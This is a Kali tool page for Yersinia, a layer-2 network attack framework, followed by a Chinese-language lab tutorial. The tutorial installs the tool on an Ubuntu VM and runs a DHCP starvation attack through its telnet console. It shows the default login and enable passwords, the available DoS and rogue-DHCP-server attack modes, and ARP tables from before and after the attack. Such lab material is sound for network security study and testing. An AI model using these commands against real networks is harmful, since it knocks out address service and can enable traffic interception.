Yersinia

Yersinia Package Description

Yersinia is a framework for performing layer 2 attacks. It is designed to take advantage of some weaknesses in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Attacks for the following network protocols are implemented in this particular release:

• Spanning Tree Protocol (STP)
• Cisco Discovery Protocol (CDP)
• Dynamic Trunking Protocol (DTP)
• Dynamic Host Configuration Protocol (DHCP)
• Hot Standby Router Protocol (HSRP)
• 802.1q
• 802.1x
• Inter-Switch Link Protocol (ISL)
• VLAN Trunking Protocol (VTP)

Source: https://github.com/tomac/yersinia
Yersinia Homepage | Kali Yersinia Repo

• Author: Alfredo Andres Omella, David Barroso Berrueta
• License: GPLv2

Tools included in the yersinia package

yersinia – Network vulnerability check software

root@kali:~# yersinia -h
    ۲�۲��
   �������۲�
 ۲��������۲�
�����۱����������
����۱������������
����۱�������������               Yersinia...
������������������۲��
۲���۱��������������۲��         The Black Death for nowadays networks
 ������۱�����������������
 �������۱���������������۲�             by Slay & tomac
  ۲�����۱�������������������
     �����۱�������������������        http://www.yersinia.net
      ۲����۱���������������۲            yersinia@yersinia.net
       ۲�����۱���������������
         �������۱����������۲�
         �۲���������۱�������     Prune your MSTP, RSTP, STP trees!!!!
             �������������۲�


Usage: yersinia [-hVGIDd] [-l logfile] [-c conffile] protocol [protocol_options]
       -V   Program version.
       -h   This help screen.
       -G   Graphical mode (GTK).
       -I   Interactive mode (ncurses).
       -D   Daemon mode.
       -d   Debug.
       -l logfile   Select logfile.
       -c conffile  Select config file.
  protocol   One of the following: cdp, dhcp, dot1q, dot1x, dtp, hsrp, isl, mpls, stp, vtp.

Try 'yersinia protocol -h' to see protocol_options help

Please, see the man page for a full list of options and many examples.
Send your bugs & suggestions to the Yersinia developers <yersinia@yersinia.net>



MOTD: The Hakin9 magazine owe money to us... 500 Euros

Yersinia Usage Example

root@kali:~# yersinia -G

 

        系统安装需求：

• OpenBSD 3.4 (note: upgrade your pcap libraries to at least 0.7.2)

• Linux 2.4.x and 2.6.x

• Solaris 5.8 64bits SPARC

• Mac OSX 10.4 Tiger (Intel)

  笔者使用操作系统：

  ubuntu-10.04-server-i386.iso ：http://mirror.zjut.com/cdimage/ubuntu-10.04-server-i386.iso

  虚拟机：vmare 7.0

  一、安装步骤

  系统安装完成后，需要在虚拟的ubuntu系统内执行如下命令：

  1）、sudo passwd root   //提示你输入新的密码，设置完成后可重新登录，测试root账号的登录(yersinia只能工作在英文模式，请不要安装中文包）

  2）、保证你的虚拟机能连接互联网：

• [root@localhost ~]# ifconfig
  eth0      Link encap:Ethernet  HWaddr 00:90:27:90:10:C7 
            inet addr:172.16.104.222  Bcast:172.16.104.255  Mask:255.255.255.0
            inet6 addr: 2001:1::290:27ff:fe90:10c7/64 Scope:Global
            inet6 addr: fe80::290:27ff:fe90:10c7/64 Scope:Link
            UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
            RX packets:64384076 errors:0 dropped:0 overruns:0 frame:0
            TX packets:80585588 errors:0 dropped:0 overruns:0 carrier:0
            collisions:0 txqueuelen:1000
            RX bytes:52522625 (50.0 MiB)  TX bytes:3316564186 (3.0 GiB)

  lo        Link encap:Local Loopback 
            inet addr:127.0.0.1  Mask:255.0.0.0
            inet6 addr: ::1/128 Scope:Host
            UP LOOPBACK RUNNING  MTU:16436  Metric:1
            RX packets:29316820 errors:0 dropped:0 overruns:0 frame:0
            TX packets:29316820 errors:0 dropped:0 overruns:0 carrier:0
            collisions:0 txqueuelen:0
            RX bytes:1189690416 (1.1 GiB)  TX bytes:1189690416 (1.1 GiB)

  [root@localhost ~]# ping 202.98.96.68
  PING 202.98.96.68 (202.98.96.68) 56(84) bytes of data.
  64 bytes from 202.98.96.68: icmp_seq=1 ttl=251 time=5.75 ms
  64 bytes from 202.98.96.68: icmp_seq=2 ttl=251 time=3.93 ms
  64 bytes from 202.98.96.68: icmp_seq=3 ttl=251 time=5.20 ms
  64 bytes from 202.98.96.68: icmp_seq=4 ttl=251 time=2.79 ms
  64 bytes from 202.98.96.68: icmp_seq=5 ttl=251 time=2.07 ms
  64 bytes from 202.98.96.68: icmp_seq=6 ttl=251 time=5.73 ms
  64 bytes from 202.98.96.68: icmp_seq=7 ttl=251 time=5.86 ms

  --- 202.98.96.68 ping statistics ---
  7 packets transmitted, 7 received, 0% packet loss, time 6000ms
  rtt min/avg/max/mdev = 2.070/4.480/5.866/1.444 ms
  [root@localhost ~]#

  3）、安装yersinia
  sudo apt-get install yersinia

  ubuntu它会自动从官方的软件库中将yersinia的所有文件安装完成，不需要你因为对linux不熟悉而烦恼。

  检查：

  root@ubuntu:~# yersinia
  GNU yersinia 0.7.1 $Date: 2006/03/23 08:40:14 $
  Try 'yersinia -h' to display the help.

  
  MOTD: Waiting for my surround speakers Audiovector Mi1 Signature... :)
  root@ubuntu:~#
  4）、安装ssh server（可选，避免每次进入到虚拟机，可通过ssh连接进去）

  sudo apt-get install openssh-server

  5）、ok ,yersina安装全部完成，我们可以通过它来实验一下攻击。

  二、简单使用

  2.1 yersina 帮助

  Usage: yersinia [-hVGIDd] [-l logfile] [-c conffile] protocol [protocol_options]
         -V   Program version.  //查看版本
         -h   This help screen.  //帮助命令
         -G   Graphical mode (GTK). //图形化界面
         -I   Interactive mode (ncurses). //交互模式
         -D   Daemon mode. //后台模式，笔者推荐
         -d   Debug. //调试械
         -l logfile   Select logfile.
         -c conffile  Select config file. //先写好相关攻击配置……
    protocol   One of the following: cdp, dhcp, dot1q, dot1x, dtp, hsrp, isl, stp, vtp.

  Try 'yersinia protocol -h' to see protocol_options help

  Please, see the man page for a full list of options and many examples.
  Send your bugs & suggestions to the Yersinia developers <yersinia@yersinia.net>

   

  MOTD: I would like to see romanian wild boars, could you invite me? :)
          Mail me at slay _at_ wasahero.org

   

  2.2 yersina attack sample

  登录用户名与密码：root/root

  enable密码：tomac

  root@ubuntu:~# telnet localhost 12000
  Trying ::1...
  Trying 127.0.0.1...
  Connected to localhost.
  Escape character is '^]'.

  Welcome to yersinia version 0.7.1.
  Copyright 2004-2005 Slay & Tomac.

  
  login: root
  password:

  MOTD: Do you have a Lexicon CX-7? Share it!! ;)

  yersinia> ena
  Password:
  yersinia#
    cancel     Cancel running attack        
    clear      Clear stats                  
    cls        Clear screen                 
    disable    Turn off privileged commands 
    exit       Exit from current level      
    prueba     Test command                 
    run        Run attack                   
    set        Set specific params for protocols
    show       Show running system information
  yersinia#

  比如：dhcp 地址耗尽攻击

  1、指定源接口

  yersinia# set dhcp interface eth0

  2、攻击开始

  yersinia# run dhcp   1

  下面是后面参数
    <0>   NONDOS attack sending RAW packet
    <1>   DOS attack sending DISCOVER packet
    <2>   NONDOS attack creating DHCP rogue server
    <3>   DOS attack sending RELEASE packet
    <cr>
  
  3、检查

  yersinia# show attacks
     No.    Protocol    Attack
     ---    --------    ------
      0      DHCP       sending DISCOVER packet
  yersinia# show dhcp attacks
     No.    Protocol    Attack
     ---    --------    ------
      0      DHCP       sending DISCOVER packet
  
  4、结果

  攻击前：

  C:\Documents and Settings\Administrator>arp -a

  Interface: 172.16.105.14 --- 0x4
    Internet Address      Physical Address      Type
    172.16.105.1          00-09-43-30-4d-c1     dynamic
    172.16.105.23         00-0c-29-1f-cf-39     dynamic

  攻击后：

  C:\Documents and Settings\Administrator>arp -a

  Interface: 172.16.105.14 --- 0x4
    Internet Address      Physical Address      Type
    172.16.105.1          00-00-00-00-00-00     invalid
    172.16.105.23         00-0c-29-1f-cf-39     dynamic

  取消攻击后：5（秒）

  C:\Documents and Settings\Administrator>arp -a

  Interface: 172.16.105.14 --- 0x4
    Internet Address      Physical Address      Type
    172.16.105.1          00-09-43-30-4d-c1     dynamic
    172.16.105.23         00-0c-29-1f-cf-39     dynamic
    172.16.105.248        00-0c-29-76-f3-53     dynamic

   

  注：附上命令参数